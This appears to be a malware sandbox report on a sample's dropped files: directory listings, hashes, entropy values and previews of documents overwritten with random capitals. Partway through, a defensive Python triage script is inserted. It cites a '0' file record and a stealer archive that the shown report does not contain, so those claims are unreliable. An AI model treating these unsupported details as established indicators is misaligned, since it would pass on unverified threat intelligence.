                                                            MD5:5E7E7A6E9D045EA64E4184ED2F45AEB8
                                                            SHA1:C0787510C1AAAFF729321A2FB3AD94B79E27E819
                                                            SHA-256:BB7D2D140CE09BB80DA52A9A7B1B3FABABDC795D6FF485751E64BD17250E021C
                                                            SHA-512:172747E7766052958DFB00C552AB9BABECBF73589F4CC8F21FB951F08404D2399652B7E6EBD0209C52F83942A97E9608A78BD44E8DE5A9F7CAC9DE12823C9C83
                                                            Malicious:false
                                                            Preview:Downloads\...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.023465189601646
                                                            Encrypted:false
                                                            SSDEEP:3:1hiR8LKB:14R8LKB
                                                            MD5:966247EB3EE749E21597D73C4176BD52
                                                            SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                            SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                            SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                            Malicious:false
                                                            Preview:OneDrive\...desktop.ini..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):88
                                                            Entropy (8bit):4.450045114302317
                                                            Encrypted:false
                                                            SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                            MD5:D430E8A326E3D75F5E49C40C111646E7
                                                            SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                            SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                            SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                            Malicious:false
                                                            Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):24
                                                            Entropy (8bit):4.053508854797679
                                                            Encrypted:false
                                                            SSDEEP:3:jgBLKB:j4LKB
                                                            MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                            SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                            SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                            SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                            Malicious:false
                                                            Preview:Startup\...desktop.ini..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4021
                                                            Entropy (8bit):5.208664393002513
                                                            Encrypted:false
                                                            SSDEEP:96:48fB3crOBE0RlE+Q74yMjL9lMaRDUnCw9KGV7GDnpKVkYh8lsV:fB/wafD5hdKYsV
                                                            MD5:318399BAB482DDE1C819ABB339F7CD0A
                                                            SHA1:0DF7522A7D23846F95E2C11A263C527FC81CB3D7
                                                            SHA-256:2D4D8CC2B40D52321EE0621199774BD4864AD2211AFEFB19C103178D1348C082
                                                            SHA-512:8065CDB19F8524C4C22E14BE69463083641978517B730FBD853FAA444D5556776D113A7766A103B09C5CCDABD46465F469737E5B2A571A3A9125F34874332EA4
                                                            Malicious:false
                                                            Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 12-30-24-218.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 12-30-37-144.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696501296901617700_E285B920-83FB-469F-8AC0-93210F7C82AA.log.....App1696501320899113200_1A06D4BB-DFF8-4391-B9AB-F88623A7807A.log.....App1696501329408245700_8059F11D-A631-42CB-859E-D78FC666AD16.log.....App1696501329408544000_8059F11D-A631-42CB-859E-D78FC666AD16.log...edge_BITS_5132_79551310\....4b56c463-a134-44ca-a2a6-86fef3e940d0...edge_BITS_6096_1007533999\....2132f61f-f790-4ae6-a355-8cf9a1533800...edge_BITS_6096_1016618583\....873489b1-33b2-480a-baa2-641b9e09edcd...edge_BITS_6096_1077744702\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6096_1080361660\....c78f9967-7a8c-44b0-ad94-732b63c89638...edge
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):23
                                                            Entropy (8bit):3.7950885863977324
                                                            Encrypted:false
                                                            SSDEEP:3:k+JrLKB:k+JrLKB
                                                            MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                            SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                            SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                            SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                            Malicious:false
                                                            Preview:Videos\...desktop.ini..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:true
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
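Added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small offline re-check of the dropped-file records above. It recomputes the four digests the report prints for the 1-byte file whose preview is "0" and confirms they match, and it recomputes the "Entropy (8bit)" figure (Shannon entropy in bits per byte) to label files the way an analyst would when pulling artefacts off the VM. The point worth noticing is the 1026-byte files marked Malicious: their entropy of 4.69-4.70 is log2(26), the entropy of text drawn uniformly from A-Z, which is exactly what the preview shows, 1024 random capitals followed by CRLF. That is a destroyed user document, not an encrypted one. The sample inputs in the block are constructed (seeded random letters, an in-memory zip, random bytes); the "1024 capitals + CRLF" layout is inferred from the preview and size fields, and the digests are copied from the record for the "0" file.

```python
"""Offline re-check of sandbox "dropped file" records (added example, not Joe Sandbox code)."""
import hashlib
import io
import math
import random
import zipfile
from collections import Counter

# Digests exactly as printed in the report for the 1-byte dropped file whose preview is "0".
REPORTED_ZERO_FILE = {
    "MD5": "CFCD208495D565EF66E7DFF9F98764DA",
    "SHA1": "B6589FC6AB0DC82CF12099D1C2D40AB994E8410C",
    "SHA-256": "5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9",
    "SHA-512": "31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025"
               "F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, the quantity the report calls 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the four algorithms the report lists per file."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_report(data: bytes, reported: dict) -> bool:
    """True when every digest the report lists agrees with the bytes actually on disk."""
    actual = digests(data)
    return all(actual[name] == value.upper() for name, value in reported.items())


def classify_dropped_file(data: bytes) -> str:
    """Coarse label from magic bytes plus entropy.

    Text drawn uniformly from A-Z has entropy log2(26) ~= 4.70 bits/byte; the
    1026-byte files in this report sit at 4.69-4.70 and preview as 1024 capitals
    plus CRLF, i.e. documents overwritten with random letters. Compressed or
    encrypted data sits above ~7.5 bits/byte; a single repeated byte sits near 0.
    """
    if data.startswith(b"PK\x03\x04"):
        return "zip-archive"
    h = shannon_entropy_8bit(data)
    if h > 7.5:
        return "compressed-or-encrypted"
    capitals = sum(1 for b in data if 0x41 <= b <= 0x5A)
    if data and capitals / len(data) > 0.95 and abs(h - math.log2(26)) < 0.1:
        return "random-uppercase-text"
    if h < 1.0:
        return "near-constant"
    return "other"


# Constructed inputs (not taken from the sandbox run): the 1-byte marker file, a fake
# overwritten document laid out like the previews above (1024 random capitals + CRLF),
# a small in-memory zip standing in for the stealer's archive, and 4 KiB of random bytes.
_rng = random.Random(2024)
ZERO_FILE = b"0"
OVERWRITTEN_DOC = bytes(_rng.choice(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ") for _ in range(1024)) + b"\r\n"
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("Browsers/Firefox/History.txt", "constructed placeholder")
STEALER_ARCHIVE = _buf.getvalue()


def triage() -> dict:
    """Run the checks an analyst would replay against the artefacts pulled from the VM."""
    return {
        "zero_file_matches_report": matches_report(ZERO_FILE, REPORTED_ZERO_FILE),
        "zero_file_entropy": shannon_entropy_8bit(ZERO_FILE),
        "overwritten_doc": classify_dropped_file(OVERWRITTEN_DOC),
        "archive": classify_dropped_file(STEALER_ARCHIVE),
        "random_blob": classify_dropped_file(RANDOM_BLOB),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name}: {result}")
```

Usage: point `matches_report` and `classify_dropped_file` at the files recovered from the analysis VM to confirm the report's digests before sharing them as indicators, and to separate the exfiltration archive (zip magic, high entropy) from the user documents the sample replaced with random capitals.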
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:true
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:true
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:true
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
